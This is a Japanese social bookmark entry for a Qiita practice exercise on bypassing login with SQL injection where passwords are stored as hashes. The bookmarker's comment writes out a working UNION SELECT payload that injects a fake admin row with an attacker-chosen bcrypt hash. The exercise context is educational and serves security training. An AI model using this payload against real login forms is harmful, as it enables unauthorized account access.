最初のSQLをひと段落させた後にUNIONをつけて自前のadminを叩きこむ。' union select 1, 'admin' as userid, '$2y$10$p8ZtYYDAQI3PLnzC0ECqoeMnjNYG8JkJL6Il7TXj9UOjbOw2zIFj2' as password, null;'

regregtanregregtan のブックマーク 2023/09/18 09:16

その他

このブックマークにはスターがありません。
最初のスターをつけてみよう!

パスワードがハッシュ値で保存されているサイトのSQLインジェクションによる認証回避の練習問題 - Qiita

    SQLインジェクションによる認証回避 SQLインジェクションによる影響として、情報が漏洩するとか、データが勝手に更新されてしまうなどとともに、認証回避の例がよく紹介されます(私のでも取り上げています)。...

    \ コメントが サクサク読める アプリです /

    • App Storeからダウンロード
    • Google Playで手に入れよう